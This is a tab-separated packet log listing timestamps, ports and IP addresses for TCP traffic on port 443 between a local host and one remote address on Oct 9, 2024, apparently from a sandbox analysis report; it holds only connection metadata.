Oct 9, 2024 16:16:03.073529959 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.073550940 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.073555946 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.073594093 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.073601961 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.073631048 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.073694944 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.073714018 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.073719978 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.073754072 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.074012995 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.074167013 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.074215889 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.074215889 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.074228048 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.074273109 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.074295998 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.074301958 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.074341059 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.074690104 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.074745893 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.074783087 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.074789047 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.074845076 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.074872971 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.074897051 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.074902058 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.074930906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.074944973 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.074950933 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.074991941 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.075001955 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.075001955 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.075011015 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.075170040 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.075189114 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.075201988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.075225115 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.075229883 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.075252056 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.075284958 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.075320005 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.075326920 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.075333118 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.075406075 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.075433016 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.075439930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.075455904 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.075500011 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.075519085 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.075524092 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.075536013 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.075537920 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.075584888 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.075591087 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.075623035 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.135144949 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.135194063 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.135222912 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.135243893 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.135257006 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.135305882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.135327101 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.135334015 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.135349989 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.135375023 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.157217979 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.157264948 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.157284975 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.157295942 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.157306910 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.157319069 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.157351017 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.157380104 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.157388926 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.157402992 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.157404900 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.157444954 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.157450914 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.157491922 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.157536983 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.157542944 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.157609940 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.158241987 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.158276081 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.158298016 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.158304930 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.158324003 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.158417940 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.159924984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.160032988 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.160056114 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.160067081 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.160082102 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.160370111 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.160861969 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.160944939 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.160965919 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.160972118 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.160990953 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.161012888 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.161091089 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.161237001 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.161237955 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.161248922 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.161297083 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.161297083 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.161845922 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.161896944 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.161930084 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.161972046 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.162321091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.162369967 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.162410975 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.162462950 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.162478924 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.162482977 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.162532091 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.162548065 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.162555933 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.162568092 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.162591934 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.162669897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.162729025 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.162735939 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.162779093 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.162825108 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.162854910 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.162875891 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.162880898 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.162899971 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.162930012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.162951946 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.162957907 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.162970066 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.162971020 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.163018942 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.163022995 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.163068056 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.163121939 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.163155079 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.163175106 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.163182020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.163196087 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.163345098 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.223002911 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.223078012 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.223098993 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.223114014 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.223134995 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.223179102 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.223196983 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.223203897 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.223217010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.223314047 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.223421097 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.223428965 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.223464966 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.244787931 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.244841099 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.244887114 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.244895935 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.244929075 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.245035887 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.245815039 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.245851994 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.245871067 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.245877981 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.245894909 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.245917082 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.245942116 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.245949030 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.245964050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.245971918 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.245999098 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.246021032 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.246027946 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.246042013 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.246057034 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.246486902 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.246495008 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.246539116 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.247646093 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.247724056 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.247745991 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.247752905 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.247767925 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.248059034 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.248584032 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.248686075 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.248713017 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.248719931 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.248735905 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.248749971 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.249002934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.249078035 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.249149084 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.249274969 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.251090050 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.251136065 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.251156092 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.251163006 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.251173019 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.251178980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.251198053 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.251202106 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.251225948 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.251247883 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.251287937 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.251295090 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.251328945 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.251461983 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.251512051 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.251524925 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.251538038 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.251543999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.251554966 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.251575947 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.251678944 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.251714945 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.251735926 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.251744032 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.251754045 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.251765966 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.251804113 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.251807928 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.251846075 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.251956940 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.251993895 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.252011061 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.252017021 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.252027035 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.252041101 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.252053976 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.252058983 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.252070904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.252079010 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.252104998 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.252109051 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.252269030 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.312417030 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.312488079 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.317024946 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.317487955 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.321916103 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.322000980 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.322082996 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.322226048 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.338249922 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.338344097 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.341845036 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.341983080 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.346664906 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.346759081 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.349143982 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.349294901 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.354055882 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.354295015 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.356301069 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.356398106 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.361077070 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.361138105 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.365751982 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.365813971 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.384850979 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.385090113 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.388647079 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.389092922 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.398129940 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.398709059 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.398963928 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.399023056 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.403707027 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.404109001 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.407732964 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.407885075 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.417896986 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.417953968 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.422115088 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.422171116 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.427793980 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.428280115 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.428373098 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.428533077 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.433095932 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.433175087 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.437378883 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.437454939 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.442641020 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.442750931 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.443588972 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.443681002 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.448367119 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.448451996 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.452085018 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.452192068 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.457102060 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.457185030 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.457921028 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.458105087 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.462733984 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.462918043 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.466578960 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.466659069 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.500446081 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.500539064 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.500946999 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.501019001 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.501024961 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.501033068 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.501076937 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.501094103 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.501353025 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.501390934 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.501413107 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.501420021 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.501432896 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.501440048 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.501468897 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.501473904 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.501490116 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.501501083 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.501538038 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.501543045 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.501555920 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.501584053 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.501594067 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.501632929 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.501660109 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.501667976 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.501686096 CEST	443	49723	84.32.84.109	192.168.2.10
Oct 9, 2024 16:16:03.501691103 CEST	49723	443	192.168.2.10	84.32.84.109
Oct 9, 2024 16:16:03.501847982 CEST	49723	443	192.168.2.10	84.32.84.109
